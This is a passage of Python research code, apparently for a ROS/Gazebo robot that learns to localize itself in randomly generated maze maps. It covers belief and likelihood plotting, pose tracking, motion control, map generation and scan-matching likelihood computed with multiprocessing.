self.update_list(self.ax_err,self.xyerrs,self.obj_err,"Error") plt.pause(1e-4) self.save_figure() def save_figure(self): if self.args.save and self.acc_epi_cnt % self.args.figure_save_freq == 0: figname=os.path.join(self.fig_path,'%03d-%03d-%03d.png'%(self.env_count, self.episode_count, self.step_count)) plt.savefig(figname) if self.args.verbose > 1: print (figname) def update_pose_plot(self, ax): pose = np.zeros((self.grid_rows,self.grid_cols,3)) pose[:,:,0] = 1-self.map_for_pose pose[:,:,1] = 1-self.map_for_pose pose[:,:,2] = 1-self.map_for_pose if (pose[self.true_grid.row, self.true_grid.col,:] == [0, 0, 0]).all(): pose[self.true_grid.row, self.true_grid.col, :] = [0.5, 0, 0] # pose[self.true_grid.row, self.true_grid.col, 2] = [0.5, 0, 0] elif (pose[self.true_grid.row, self.true_grid.col,:] == [1, 1, 1]).all(): pose[self.true_grid.row, self.true_grid.col, :] = [1.0, 0, 0] if (pose[self.bel_grid.row, self.bel_grid.col, :] == [0,0,0]).all(): pose[self.bel_grid.row, self.bel_grid.col, :] = [0,0,0.5] elif (pose[self.bel_grid.row, self.bel_grid.col, :] == [1,1,1]).all(): pose[self.bel_grid.row, self.bel_grid.col, :] = [0,0,1] elif (pose[self.bel_grid.row, self.bel_grid.col, :] == [1,0,0]).all(): pose[self.bel_grid.row, self.bel_grid.col, :] = [.5,0,.5] elif (pose[self.bel_grid.row, self.bel_grid.col, :] == [0.5,0,0]).all(): pose[self.bel_grid.row, self.bel_grid.col, :] = [0.25,0,0.25] if self.collision: pose[min(self.grid_rows-1, max(0, self.collision_grid.row)), min(self.grid_cols-1, max(0, self.collision_grid.col)),:] = [0.5, 0.5, 0] if self.obj_pose == None: self.obj_pose = ax.imshow(pose, cmap = plt.cm.binary,interpolation='nearest') ax.grid() ax.set_yticks(np.arange(0,self.grid_rows)-0.5) ax.set_xticks(np.arange(0,self.grid_cols)-0.5) ax.tick_params(axis='y', labelleft='off') ax.tick_params(axis='x', labelbottom='off') ax.tick_params(bottom="off", left="off") ax.set_title("Occupancy Grid") else: self.obj_pose.set_data(pose) def update_likely_plot(self,ax): lik = self.likelihood.cpu().detach().numpy() # if lik.min() == lik.max(): # lik *= 0 # lik -= lik.min() # lik /= lik.max() lik, side = self.square_clock(lik, self.grid_dirs) # lik=self.circular_placement(lik, self.grid_dirs) # lik = lik.reshape(self.grid_rows*self.grid_dirs,self.grid_cols) # lik = np.swapaxes(lik,0,1) # lik = lik.reshape(self.grid_rows, self.grid_dirs*self.grid_cols) # lik = np.concatenate((lik[0,:,:],lik[1,:,:],lik[2,:,:],lik[3,:,:]), axis=1) if self.obj_lik == None: self.obj_lik = ax.imshow(lik,interpolation='nearest') ax.grid() ticks = np.linspace(0,self.grid_rows*side, side,endpoint=False)-0.5 ax.set_yticks(ticks) ax.set_xticks(ticks) ax.tick_params(axis='y', labelleft='off') ax.tick_params(axis='x', labelbottom='off') ax.tick_params(bottom="off", left="off") ax.set_title('Likelihood from NN') else: self.obj_lik.set_data(lik) self.obj_lik.set_norm(norm = cm.Normalize().autoscale(lik)) def update_act_dist(self, ax): y = self.prob.flatten() if self.obj_act == None: x = range(y.size) self.obj_act = ax.bar(x,y) ax.set_ylim([0, 1.1]) ax.set_title("Action PDF") ax.set_xticks(np.array([0,1,2])) ax.set_xticklabels(('L','R','F')) self.obj_act_act = None else: for bar,a in zip(self.obj_act, y): bar.set_height(a) if self.obj_act_act == None : if self.action_from_policy is not -1: self.obj_act_act = ax.text(self.action_from_policy, y[self.action_from_policy], '*') else: if self.action_from_policy is not -1: self.obj_act_act.set_position((self.action_from_policy, y[self.action_from_policy])) def clear_act_dist(self, ax): ax.clear() if self.obj_act==None: pass else: self.obj_act = None if self.obj_act_act == None: pass else: self.obj_act_act = None def update_list(self,ax,y,obj,title, text=None): # y = self.rewards x = range(len(y)) if obj == None: obj, = ax.plot(x,y,'.-') ax.set_title(title) else: obj.set_ydata(y) obj.set_xdata(x) if text is not None: ax.text(x[-1],y[-1], text) # recompute the ax.dataLim ax.relim() # update ax.viewLim using the new dataLim ax.autoscale_view() return obj def update_bel_dist(self,ax): y = (self.belief.cpu().detach().numpy().flatten()) gt = np.zeros_like(self.belief.cpu().detach().numpy()) gt[self.true_grid.head, self.true_grid.row, self.true_grid.col] = 1 gt = gt.flatten() gt_x = np.argmax(gt) if self.obj_bel_dist == None: x = range(y.size) self.obj_bel_dist, = ax.plot(x,y,'.') self.obj_bel_max, = ax.plot(np.argmax(y), np.max(y), 'x', color='r', label='bel') self.obj_gt_bel, = ax.plot(gt_x, y[gt_x], '^', color='r', label='gt') ax.legend() self.obj_bel_val = ax.text(np.argmax(y), np.max(y), "%f"%np.max(y)) ax.set_ylim([0, y.max()*2]) # ax.set_ylabel('Belief') # ax.set_xlabel('Pose') ax.set_title("Belief") else: self.obj_bel_dist.set_ydata(y) self.obj_bel_max.set_xdata(np.argmax(y)) self.obj_bel_max.set_ydata(np.max(y)) self.obj_gt_bel.set_xdata(gt_x) self.obj_gt_bel.set_ydata(y[gt_x]) self.obj_bel_val.set_position((np.argmax(y), np.max(y))) self.obj_bel_val.set_text("%f"%np.max(y)) ax.set_ylim([0, y.max()*2]) def update_gtl_dist(self,ax): # y = (self.gt_likelihood.cpu().detach().numpy().flatten()) y = self.gt_likelihood.flatten() if self.obj_gtl_dist == None: x = range(y.size) self.obj_gtl_dist, = ax.plot(x,y,'.') self.obj_gtl_max, = ax.plot(np.argmax(y), np.max(y), 'rx') ax.set_ylim([0, y.max()*2]) # ax.set_ylabel('GTL') # ax.set_xlabel('Pose') ax.set_title("GTL") else: self.obj_gtl_dist.set_ydata(y) self.obj_gtl_max.set_ydata(np.max(y)) self.obj_gtl_max.set_xdata(np.argmax(y)) ax.set_ylim([0, y.max()*2]) def update_lik_dist(self,ax): y = (self.likelihood.cpu().detach().numpy().flatten()) if self.obj_lik_dist == None: x = range(y.size) self.obj_lik_dist, = ax.plot(x,y,'.') self.obj_lik_max, = ax.plot(np.argmax(y), np.max(y), 'rx') ax.set_ylim([0, y.max()*2]) # ax.set_ylabel('Likelihood') # ax.set_xlabel('Pose') ax.set_title("Likelihood") else: self.obj_lik_dist.set_ydata(y) self.obj_lik_max.set_ydata(np.max(y)) self.obj_lik_max.set_xdata(np.argmax(y)) ax.set_ylim([0, y.max()*2]) def update_belief_plot(self,ax): bel = self.belief.cpu().detach().numpy() # if bel.min() == bel.max(): # bel *= 0 # bel -= bel.min() # bel /= bel.max() bel,side = self.square_clock(bel, self.grid_dirs) #bel=self.circular_placement(bel, self.grid_dirs) # bel = bel.reshape(self.grid_rows*self.grid_dirs,self.grid_cols) # bel = np.swapaxes(bel,0,1) # bel = bel.reshape(self.grid_rows,self.grid_dirs*self.grid_cols) # bel = np.concatenate((bel[0,:,:],bel[1,:,:],bel[2,:,:],bel[3,:,:]), axis=1) if self.obj_bel == None: self.obj_bel = ax.imshow(bel,interpolation='nearest') ax.grid() ticks = np.linspace(0,self.grid_rows*side, side,endpoint=False)-0.5 ax.set_yticks(ticks) ax.set_xticks(ticks) ax.tick_params(axis='y', labelleft='off') ax.tick_params(axis='x', labelbottom='off') ax.tick_params(bottom="off", left="off") ax.set_title('Belief (%.3f)'%self.belief.cpu().detach().numpy().max()) else: self.obj_bel.set_data(bel) ax.set_title('Belief (%.3f)'%self.belief.cpu().detach().numpy().max()) self.obj_bel.set_norm(norm = cm.Normalize().autoscale(bel)) def update_prior_plot(self,ax): bel = np.copy(self.prior) bel,side = self.square_clock(bel, self.grid_dirs) if self.obj_bel_prior == None: self.obj_bel_prior = ax.imshow(bel,interpolation='nearest') ax.grid() ticks = np.linspace(0,self.grid_rows*side, side,endpoint=False)-0.5 ax.set_yticks(ticks) ax.set_xticks(ticks) ax.tick_params(axis='y', labelleft='off') ax.tick_params(axis='x', labelbottom='off') ax.tick_params(bottom="off", left="off") ax.set_title('Prior (%.3f)'%self.prior.max()) else: self.obj_bel_prior.set_data(bel) ax.set_title('Prior (%.3f)'%self.prior.max()) self.obj_bel_prior.set_norm(norm = cm.Normalize().autoscale(bel)) def update_gtl_plot(self,ax): # gtl = self.gt_likelihood.cpu().detach().numpy() gtl = self.gt_likelihood gtl, side = self.square_clock(gtl, self.grid_dirs) if self.obj_gtl == None: self.obj_gtl = ax.imshow(gtl,interpolation='nearest') ax.grid() ticks = np.linspace(0,self.grid_rows*side, side,endpoint=False)-0.5 ax.set_yticks(ticks) ax.set_xticks(ticks) ax.tick_params(axis='y', labelleft='off') ax.tick_params(axis='x', labelbottom='off') ax.tick_params(bottom="off", left="off") ax.set_title('Target Likelihood') else: self.obj_gtl.set_data(gtl) self.obj_gtl.set_norm(norm = cm.Normalize().autoscale(gtl)) def report_status(self,end_episode=False): if end_episode: reward = sum(self.rewards) loss = self.loss_ll #sum(self.loss_likelihood) dist = sum(self.manhattans) else: reward = self.rewards[-1] loss = self.loss_ll dist = self.manhattan eucl = self.get_euclidean() if self.optimizer == None: lr_rl = 0 else: lr_rl = self.optimizer.param_groups[0]['lr'] if self.optimizer_pm == None: lr_pm = 0 else: lr_pm = self.optimizer_pm.param_groups[0]['lr'] if self.args.save: with open(self.log_filepath,'a') as flog: flog.write('%d %d %d %f %f %f %f %f %f %f %f %e %e %f\n'%(self.env_count, self.episode_count,self.step_count, loss, dist, reward, self.loss_policy, self.loss_value, self.prob[0,0],self.prob[0,1],self.prob[0,2], lr_rl, lr_pm, eucl )) print('%d %d %d %f %f %f %f %f %f %f %f %e %e %f'%(self.env_count, self.episode_count,self.step_count, loss, dist, reward, self.loss_policy, self.loss_value, self.prob[0,0],self.prob[0,1],self.prob[0,2], lr_rl, lr_pm, eucl )) def process_link_state(self, pose): return np.array([ pose.position.x, pose.position.y, pose.position.z, pose.orientation.x, pose.orientation.y, pose.orientation.z, pose.orientation.w ]) def process_model_state(self, pose): return np.array([ pose.position.x, pose.position.y, pose.position.z, pose.orientation.x, pose.orientation.y, pose.orientation.z, pose.orientation.w ]) def update_current_pose_from_gazebo(self): rospy.wait_for_service('/gazebo/get_model_state') loc = self.get_model_state(self.robot_model_name,'') qtn=loc.pose.orientation roll,pitch,yaw=quaternion_to_euler_angle(qtn.w, qtn.x, qtn.y, qtn.z) self.current_pose = Pose2d(theta=yaw, x=loc.pose.position.x, y=loc.pose.position.y) def update_current_pose_from_robot(self): self.current_pose.x = self.live_pose.x self.current_pose.y = self.live_pose.y self.current_pose.theta = self.live_pose.theta def update_true_grid(self): self.true_grid.row=to_index(self.current_pose.x, self.grid_rows, self.xlim) self.true_grid.col=to_index(self.current_pose.y, self.grid_cols, self.ylim) heading = self.current_pose.theta self.true_grid.head = self.grid_dirs * wrap(heading + np.pi/self.grid_dirs) / 2.0 / np.pi self.true_grid.head = int(self.true_grid.head % self.grid_dirs) def sync_goal_to_true_grid(self): self.perturbed_goal_pose.x = to_real(self.true_grid.row, self.xlim, self.grid_rows) self.perturbed_goal_pose.y = to_real(self.true_grid.col, self.ylim, self.grid_cols) self.perturbed_goal_pose.theta = self.heading_resol*self.true_grid.head def sync_goal_to_current(self): self.goal_pose.x = self.current_pose.x self.goal_pose.y = self.current_pose.y self.goal_pose.theta = self.current_pose.theta self.perturbed_goal_pose.x = self.current_pose.x self.perturbed_goal_pose.y = self.current_pose.y self.perturbed_goal_pose.theta = self.current_pose.theta def init_motion_control(self): # self.start_pose = self.believed_pose self.t_motion_init = time.time() # self.wait_for_scan = True return def do_motion_control(self): start_pose = self.believed_pose goal_pose = self.perturbed_goal_pose # soft copy ! odom_pose = (self.odom_pose.x, self.odom_pose.y, self.odom_pose.theta) # update from cbOdom odom_T_obs = tuple_to_hg(odom_pose) map_T_obs = np.dot(self.map_T_odom, odom_T_obs) map_pose = np.array(hg_to_tuple(map_T_obs), np.float32) self.map_pose.x = map_pose[0] self.map_pose.y = map_pose[1] self.map_pose.theta = map_pose[2] self.publish_dal_pose(self.map_pose.x, self.map_pose.y, self.map_pose.theta) t_elapse = time.time() - self.t_motion_init done = False fwd_err = 0 lat_err = 0 ang_err = 0 if self.action_str == "go_fwd": # go 1 step fwd fwd_check = self.fwd_clear() & self.fwd_clear_bottom() if fwd_check == False: self.pub_cmdvel.publish(self.twist_msg_stop) rospy.loginfo("Forward is Not Clear") done = True else: p_start = np.array([start_pose.x, start_pose.y]) p_goal = np.array([goal_pose.x, goal_pose.y]) p_now = np.array([self.map_pose.x, self.map_pose.y]) yaw_now = self.map_pose.theta fwd_err,lat_err,ang_err = transform(p_start,p_goal,p_now, yaw_now) if fwd_err > - self.fwd_err_margin: # done self.pub_cmdvel.publish(self.twist_msg_stop) done = True else: #go fwd_vel, ang_vel = control_law(fwd_err, lat_err, ang_err, t_elapse) self.twist_msg_move.linear.x = fwd_vel self.twist_msg_move.linear.y = 0 self.twist_msg_move.angular.z = ang_vel self.pub_cmdvel.publish(self.twist_msg_move) done = False elif self.action_str == "turn_left" or self.action_str == "turn_right": # turn # measure orientation error: ang_err = wrap(goal_pose.theta - self.map_pose.theta) fwd_err = 0 lat_err = 0 if np.abs(ang_err) > self.ang_err_margin: fwd_vel, ang_vel = control_law(fwd_err, lat_err, -ang_err, t_elapse) # ang_vel = np.clip(self.turn_gain*ang_err, -self.max_turn_rate, self.max_turn_rate) self.twist_msg_move.linear.x = fwd_vel self.twist_msg_move.linear.y = 0 self.twist_msg_move.angular.z = ang_vel self.pub_cmdvel.publish(self.twist_msg_move) done = False else: self.pub_cmdvel.publish(self.twist_msg_stop) done = True if self.args.verbose > 1: print ("fwd err: %.3f, lat err: %.3f, ang err(deg): %.2f"%( fwd_err, lat_err, math.degrees(ang_err))) return not done def teleport_turtle(self): if self.args.verbose>1: print("inside turtle teleportation") # if self.args.perturb > 0: self.current_pose.x = self.perturbed_goal_pose.x self.current_pose.y = self.perturbed_goal_pose.y self.current_pose.theta = self.perturbed_goal_pose.theta # pose = self.turtle_pose_msg # twist = self.turtle_twist_msg # msg = ModelState() # msg.model_name = self.robot_model_name # msg.pose = pose # msg.twist = twist # if self.args.verbose > 1: # print("teleport target = %f,%f"%(msg.pose.position.x, msg.pose.position.y)) # rospy.wait_for_service('/gazebo/set_model_state') # resp = self.set_model_state(msg) # while True: # rospy.wait_for_service("/gazebo/get_model_state") # loc = self.get_model_state(self.robot_model_name,'') # if np.abs(self.process_model_state(loc.pose) - self.process_model_state(msg.pose)).sum(): # break # if self.args.verbose > 1: # print("teleport result = %f,%f"%(loc.pose.position.x, loc.pose.position.y)) def set_maze_grid(self): # decide maze grids for each env # if self.args.maze_grids_range[0] == None: # pass # else: self.n_maze_grids = np.random.choice(self.args.n_maze_grids) self.hall_width = self.map_width_meter/self.n_maze_grids if self.args.thickness == None: self.obs_radius = 0.25*self.hall_width else: self.obs_radius = 0.5*self.args.thickness * self.hall_width def random_map(self): self.set_maze_grid() self.set_walls() self.map_for_LM = fill_outer_rim(self.map_for_LM, self.map_rows, self.map_cols) if self.args.distort_map: self.map_for_LM = distort_map(self.map_for_LM, self.map_rows, self.map_cols) self.map_for_LM = fill_outer_rim(self.map_for_LM, self.map_rows, self.map_cols) def random_box(self): #rooms_row: number of rooms in a row [a,b): a <= n < b #rooms_col: number of rooms in a col [a,b): a <= n < b kwargs = {'rooms_row':(2,3), 'rooms_col':(1,3), 'slant_scale':2, 'n_boxes':(1,8), 'thick':50, 'thick_scale':3} ps = PartitionSpace(**kwargs) # p_open : probability to have the doors open between rooms ps.connect_rooms(p_open=1.0) # set output map size self.map_for_LM = ps.get_map(self.map_rows,self.map_cols) def read_map(self): ''' set map_design (grid_rows x grid_cols), map_2d (map_rows x map_cols), map_for_RL for RL state (n_state_grids x n_state_grids) ''' self.map_for_LM = np.load(self.args.load_map) # self.map_for_pose = np.load(self.args.load_map_LM) # mdt = np.load(self.args.load_map_RL) # self.map_for_RL[0,:,:] = torch.tensor(mdt).float().to(self.device) def set_walls(self): ''' set map_design, map_2d, map_for_RL ''' if self.args.test_mode: map_file = os.path.join(self.args.test_data_path, "map-design-%05d.npy"%self.env_count) maze = np.load(map_file) else: if self.args.random_rm_cells[1]>0: low=self.args.random_rm_cells[0] high=self.args.random_rm_cells[1] num_cells_to_delete = np.random.randint(low, high) else: num_cells_to_delete = self.args.rm_cells if self.args.save_boundary == 'y': save_boundary = True elif self.args.save_boundary == 'n': save_boundary = False else: save_boundary = True if np.random.random()>0.5 else False maze_options = {'save_boundary': save_boundary, "min_blocks": 10} maze = generate_map(self.n_maze_grids, num_cells_to_delete, **maze_options ) for i in range(self.n_maze_grids): for j in range(self.n_maze_grids): if i < self.n_maze_grids-1: if maze[i,j]==1 and maze[i+1,j]==1: #place vertical self.set_a_wall([i,j],[i+1,j],self.n_maze_grids,horizontal=False) if j < self.n_maze_grids-1: if maze[i,j]==1 and maze[i,j+1] ==1: #place horizontal wall self.set_a_wall([i,j],[i,j+1],self.n_maze_grids,horizontal=True) if i>0 and i<self.n_maze_grids-1 and j>0 and j<self.n_maze_grids-1: if maze[i,j]==1 and maze[i-1,j] == 0 and maze[i+1,j]==0 and maze[i,j-1]==0 and maze[i,j+1]==0: self.set_a_pillar([i,j], self.n_maze_grids) def make_low_dim_maps(self): self.map_for_pose = cv2.resize(self.map_for_LM, (self.grid_rows, self.grid_cols),interpolation=cv2.INTER_AREA) self.map_for_pose = normalize(self.map_for_pose) self.map_for_pose = np.clip(self.map_for_pose, 0.0, 1.0) mdt = cv2.resize(self.map_for_LM,(self.args.n_state_grids,self.args.n_state_grids), interpolation=cv2.INTER_AREA) mdt = normalize(mdt) mdt = np.clip(mdt, 0.0, 1.0) self.map_for_RL[0,:,:] = torch.tensor(mdt).float().to(self.device) def clear_objects(self): # rows = 4 # cols =5 # steps = [0.4, 0.4] # for i,cyl in enumerate(self.cylinders): # name = cyl['name'] # msg = LinkState() # msg.link_name = name # msg.pose.position.x = -4 - steps[0]*(i//cols) # msg.pose.position.y = 5 + steps[1]*(i%cols) # rospy.wait_for_service('/gazebo/set_link_state') # self.set_link_state(msg) # rows = 5 # cols =20 # steps = [0.7, 0.2] # for i,wal in enumerate(self.walls): # name = wal['name'] # msg = LinkState() # msg.link_name = name # msg.pose.position.x = 4 + steps[0]*(i//cols) # msg.pose.position.y = -5 + steps[1]*(i%cols) # rospy.wait_for_service('/gazebo/set_link_state') # self.set_link_state(msg) # msg = ModelState() # msg.model_name = self.robot_model_name # msg.pose.position.x = 0 # msg.pose.position.y = -5 # rospy.wait_for_service('/gazebo/set_model_state') # self.set_model_state(msg) self.map_for_LM = np.zeros((self.map_rows, self.map_cols)) self.map_for_pose = np.zeros((self.grid_rows, self.grid_cols),dtype='float') # self.map_for_RL = torch.zeros((1,self.grid_rows, self.grid_cols),device=torch.device(self.device)) self.map_for_RL = torch.zeros((1,self.args.n_state_grids, self.args.n_state_grids),device=torch.device(self.device)) def set_a_pillar(self, a, grids): x=to_real(a[0], self.xlim, grids) y=to_real(a[1], self.ylim, grids) #rad = self.obs_radius if self.args.backward_compatible_maps: rad = 0.15 elif self.args.random_thickness: rad = np.random.normal(loc=self.obs_radius, scale=self.hall_width*0.25) rad = np.clip(rad, self.hall_width*0.25, self.hall_width*0.5) else: rad = self.obs_radius corner0 = [x+rad,y+rad] corner1 = [x-rad,y-rad] x0 = to_index(corner0[0], self.map_rows, self.xlim) y0 = to_index(corner0[1], self.map_cols, self.ylim) x1 = to_index(corner1[0], self.map_rows, self.xlim) y1 = to_index(corner1[1], self.map_cols, self.ylim) for ir in range(x0,x1+1): for ic in range(y0,y1+1): dx = to_real(ir, self.xlim, self.map_rows) - x dy = to_real(ic, self.ylim, self.map_cols) - y dist = np.sqrt(dx**2+dy**2) if dist <= rad: self.map_for_LM[ir,ic]=1.0 def set_a_wall(self,a,b,grids,horizontal=True): ax = to_real(a[0], self.xlim, grids) ay = to_real(a[1], self.ylim, grids) bx = to_real(b[0], self.xlim, grids) by = to_real(b[1], self.ylim, grids) # if horizontal: # yaw=math.radians(90) # else: # yaw=math.radians(0) #rad = self.obs_radius if self.args.backward_compatible_maps: rad = 0.1*np.ones(4) elif self.args.random_thickness: rad = np.random.normal(loc=self.obs_radius, scale=self.hall_width*0.25, size=4) rad = np.clip(rad, self.hall_width*0.1, self.hall_width*0.5) else: rad = self.obs_radius*np.ones(4) corner0 = [ax+rad[0],ay+rad[1]] corner1 = [bx-rad[2],by-rad[3]] x0 = to_index(corner0[0], self.map_rows, self.xlim) y0 = to_index(corner0[1], self.map_cols, self.ylim) if self.args.backward_compatible_maps: x1 = to_index(corner1[0], self.map_rows, self.xlim) y1 = to_index(corner1[1], self.map_cols, self.ylim) else: x1 = to_index(corner1[0], self.map_rows, self.xlim)#+1 y1 = to_index(corner1[1], self.map_cols, self.ylim)#+1 self.map_for_LM[x0:x1, y0:y1]=1.0 # x0 = to_index(corner0[0], self.grid_rows, self.xlim) # y0 = to_index(corner0[1], self.grid_cols, self.ylim) # x1 = to_index(corner1[0], self.grid_rows, self.xlim)+1 # y1 = to_index(corner1[1], self.grid_cols, self.ylim)+1 # self.map_for_pose[x0:x1, y0:y1]=1.0 def sample_a_pose(self): # new turtle location (random) check = True collision_radius = 0.50 while (check): turtle_can = range(self.grid_rows*self.grid_cols) turtle_bin = np.random.choice(turtle_can,1) self.true_grid.row = turtle_bin//self.grid_cols self.true_grid.col = turtle_bin% self.grid_cols self.true_grid.head = np.random.randint(self.grid_dirs) self.goal_pose.x = to_real(self.true_grid.row, self.xlim, self.grid_rows) self.goal_pose.y = to_real(self.true_grid.col, self.ylim, self.grid_cols) self.goal_pose.theta = wrap(self.true_grid.head*self.heading_resol) check = self.collision_fnc(self.goal_pose.x, self.goal_pose.y, collision_radius, self.map_for_LM) def place_turtle(self): # new turtle location (random) check = True cnt = 0 while (check): if cnt > 100: return False cnt += 1 turtle_can = range(self.grid_rows*self.grid_cols) turtle_bin = np.random.choice(turtle_can,1) self.true_grid.row = turtle_bin//self.grid_cols self.true_grid.col = turtle_bin% self.grid_cols self.true_grid.head = np.random.randint(self.grid_dirs) self.goal_pose.x = to_real(self.true_grid.row, self.xlim, self.grid_rows) self.goal_pose.y = to_real(self.true_grid.col, self.ylim, self.grid_cols) self.goal_pose.theta = wrap(self.true_grid.head*self.heading_resol) check = self.collision_fnc(self.goal_pose.x, self.goal_pose.y, self.collision_radius, self.map_for_LM) check = True cnt = 0 while (check): if cnt > 100: return False cnt += 1 if self.args.init_error == "XY" or self.args.init_error == "BOTH": delta_x = (0.5-np.random.rand())*(self.xlim[1]-self.xlim[0])/self.grid_rows delta_y = (0.5-np.random.rand())*(self.ylim[1]-self.ylim[0])/self.grid_cols else: delta_x=0 delta_y=0 if self.args.init_error == "THETA" or self.args.init_error == "BOTH": delta_theta = (0.5-np.random.rand())*self.heading_resol else: delta_theta=0 self.perturbed_goal_pose.x = self.goal_pose.x+delta_x self.perturbed_goal_pose.y = self.goal_pose.y+delta_y self.perturbed_goal_pose.theta = self.goal_pose.theta+delta_theta check = self.collision_fnc(self.perturbed_goal_pose.x, self.perturbed_goal_pose.y, self.collision_radius, self.map_for_LM) if self.args.test_mode: pg_pose_file = os.path.join(self.args.test_data_path, "pg-pose-%05d.npy"%self.env_count) g_pose_file = os.path.join(self.args.test_data_path, "g-pose-%05d.npy"%self.env_count) pg_pose = np.load(pg_pose_file) g_pose = np.load(g_pose_file) self.goal_pose.theta = g_pose[0] self.goal_pose.x = g_pose[1] self.goal_pose.y = g_pose[2] if self.args.init_error == "XY" or self.args.init_error == "BOTH": self.perturbed_goal_pose.x = pg_pose[1] self.perturbed_goal_pose.y = pg_pose[2] else: self.perturbed_goal_pose.x = g_pose[1] self.perturbed_goal_pose.y = g_pose[2] if self.args.init_error == "THETA" or self.args.init_error == "BOTH": self.perturbed_goal_pose.theta = pg_pose[0] else: self.perturbed_goal_pose.theta = g_pose[0] if self.args.verbose > 1: print ('gt_row,col,head = %f,%f,%d'%(self.true_grid.row,self.true_grid.col,self.true_grid.head)) print('x_goal,y_goal,target_ori=%f,%f,%f'%(self.goal_pose.x,self.goal_pose.y,self.goal_pose.theta)) # self.turtle_pose_msg.position.x = self.goal_pose.x # self.turtle_pose_msg.position.y = self.goal_pose.y # yaw = self.goal_pose.theta # self.turtle_pose_msg.orientation = geometry_msgs.msg.Quaternion(*tf_conversions.transformations.quaternion_from_euler(0, 0, yaw)) self.teleport_turtle() self.update_true_grid() # self.update_current_pose() return True def reset_explored(self): # reset explored area to all 0's self.explored_space = np.zeros((self.grid_dirs,self.grid_rows, self.grid_cols),dtype='float') self.new_pose = False return def update_bel_list(self): guess = self.bel_grid # guess = np.unravel_index(np.argmax(self.belief.cpu().detach().numpy(), axis=None), self.belief.shape) if guess not in self.bel_list: self.new_bel = True self.bel_list.append(guess) if self.args.verbose > 2: print ("bel_list", len(self.bel_list)) else: self.new_bel = False def update_explored(self): if self.explored_space[self.true_grid.head,self.true_grid.row, self.true_grid.col] == 0.0: self.new_pose = True else: self.new_pose = False self.explored_space[self.true_grid.head,self.true_grid.row, self.true_grid.col] = 1.0 return def normalize_gtl(self): gt = self.gt_likelihood self.gt_likelihood_unnormalized = np.copy(self.gt_likelihood) if self.args.gtl_output == "softmax": gt = softmax(gt, self.args.temperature) # gt = torch.from_numpy(softmax(gt)).float().to(self.device) elif self.args.gtl_output == "softermax": gt = softermax(gt) # gt = torch.from_numpy(softmin(gt)).float().to(self.device) elif self.args.gtl_output == "linear": gt = np.clip(gt, 1e-5, 1.0) gt=gt/gt.sum() # gt = torch.from_numpy(gt/gt.sum()).float().to(self.device) # self.gt_likelihood = torch.tensor(gt).float().to(self.device) self.gt_likelihood = gt def get_gtl_cos_mp(self, ref_scans, scan_data, my_dirs, return_dict): chk_rad = 0.05 offset = 360.0/self.grid_dirs y= np.array(scan_data.ranges_2pi)[::self.args.pm_scan_step] y = np.clip(y, self.min_scan_range, self.max_scan_range) for heading in my_dirs: X = np.roll(ref_scans, -int(offset*heading),axis=2)[:,:,::self.args.pm_scan_step] gtl = np.zeros((self.grid_rows, self.grid_cols)) for i_ld in range(self.grid_rows): for j_ld in range(self.grid_cols): if self.collision_fnc(to_real(i_ld, self.xlim, self.grid_rows), to_real(j_ld, self.ylim, self.grid_cols), chk_rad, self.map_for_LM): # if self.map_for_pose[i_ld, j_ld]>0.4: gtl[i_ld,j_ld]=0.0 else: x = X[i_ld,j_ld,:] x = np.clip(x, self.min_scan_range, self.max_scan_range) gtl[i_ld,j_ld] = self.get_cosine_sim(x,y) ### return_dict[heading] = {'gtl': gtl} def get_gtl_cos_mp2(self, my_dirs, scan_data, return_dict): chk_rad = 0.05 offset = 360.0/self.grid_dirs y= np.array(scan_data.ranges_2pi)[::self.args.pm_scan_step] y = np.clip(y, self.min_scan_range, self.max_scan_range) for heading in my_dirs: X = np.roll(self.scans_over_map, -int(offset*heading), axis=2)[:,:,::self.args.pm_scan_step] gtl = np.zeros((self.grid_rows, self.grid_cols)) for i_ld in range(self.grid_rows): for j_ld in range(self.grid_cols): if self.collision_fnc(to_real(i_ld, self.xlim, self.grid_rows), to_real(j_ld, self.ylim, self.grid_cols), chk_rad, self.map_for_LM): # if self.map_for_pose[i_ld, j_ld]>0.4: gtl[i_ld,j_ld]=0.0 else: x = X[i_ld,j_ld,:] x = np.clip(x, self.min_scan_range, self.max_scan_range) gtl[i_ld,j_ld] = self.get_cosine_sim(x,y) ### return_dict[heading] = {'gtl': gtl} def get_gtl_corr_mp(self, ref_scans, my_dirs, return_dict, clip): chk_rad = 0.05 offset = 360/self.grid_dirs y= np.array(self.scan_data_at_unperturbed.ranges_2pi)[::self.args.pm_scan_step] y = np.clip(y, self.min_scan_range, self.max_scan_range) for heading in my_dirs: X = np.roll(ref_scans, -offset*heading,axis=2)[:,:,::self.args.pm_scan_step] gtl = np.zeros((self.grid_rows, self.grid_cols)) for i_ld in range(self.grid_rows): for j_ld in range(self.grid_cols): if self.collision_fnc(to_real(i_ld, self.xlim, self.grid_rows), to_real(j_ld, self.ylim, self.grid_cols), chk_rad, self.map_for_LM): # if self.map_for_pose[i_ld, j_ld]>0.4: gtl[i_ld,j_ld]=0.0 else: x = X[i_ld,j_ld,:] x = np.clip(x, self.min_scan_range, self.max_scan_range) gtl[i_ld,j_ld] = self.get_corr(x,y,clip=clip) ### return_dict[heading] = {'gtl': gtl} def get_gt_likelihood_cossim(self, ref_scans, scan_data): # start_time = time.time() manager = multiprocessing.Manager() return_dict = manager.dict() accum = 0 procs = [] for i_worker in range(min(self.args.n_workers, self.grid_dirs)): n_dirs = self.grid_dirs/self.args.n_workers if i_worker < self.grid_dirs % self.args.n_workers: n_dirs +=1 my_dirs = range(accum, accum+n_dirs) accum += n_dirs if len(my_dirs)>0: pro = multiprocessing.Process(target = self.get_gtl_cos_mp, args = [ref_scans, scan_data, my_dirs, return_dict]) procs.append(pro) [pro.start() for pro in procs] [pro.join() for pro in procs] gtl = np.ones((self.grid_dirs,self.grid_rows,self.grid_cols)) for i in range(self.grid_dirs): ret = return_dict[i] gtl[i,:,:] = ret['gtl'] return gtl # for i in range(self.grid_dirs): # ret = return_dict[i] # self.gt_likelihood[i,:,:] = ret['gtl'] # # self.gt_likelihood[i,:,:] = torch.tensor(ret['gtl']).float().to(self.device) def get_gt_likelihood_cossim2(self, scan_data): # start_time = time.time() manager = multiprocessing.Manager() return_dict = manager.dict() accum = 0 procs = [] for i_worker in range(min(self.args.n_workers, self.grid_dirs)): n_dirs = self.grid_dirs/self.args.n_workers if i_worker < self.grid_dirs % self.args.n_workers: n_dirs +=1 my_dirs = range(accum, accum+n_dirs) accum += n_dirs if len(my_dirs)>0: pro = multiprocessing.Process(target = self.get_gtl_cos_mp2, args = [my_dirs, scan_data, return_dict]) procs.append(pro) [pro.start() for pro in procs] [pro.join() for pro in procs] 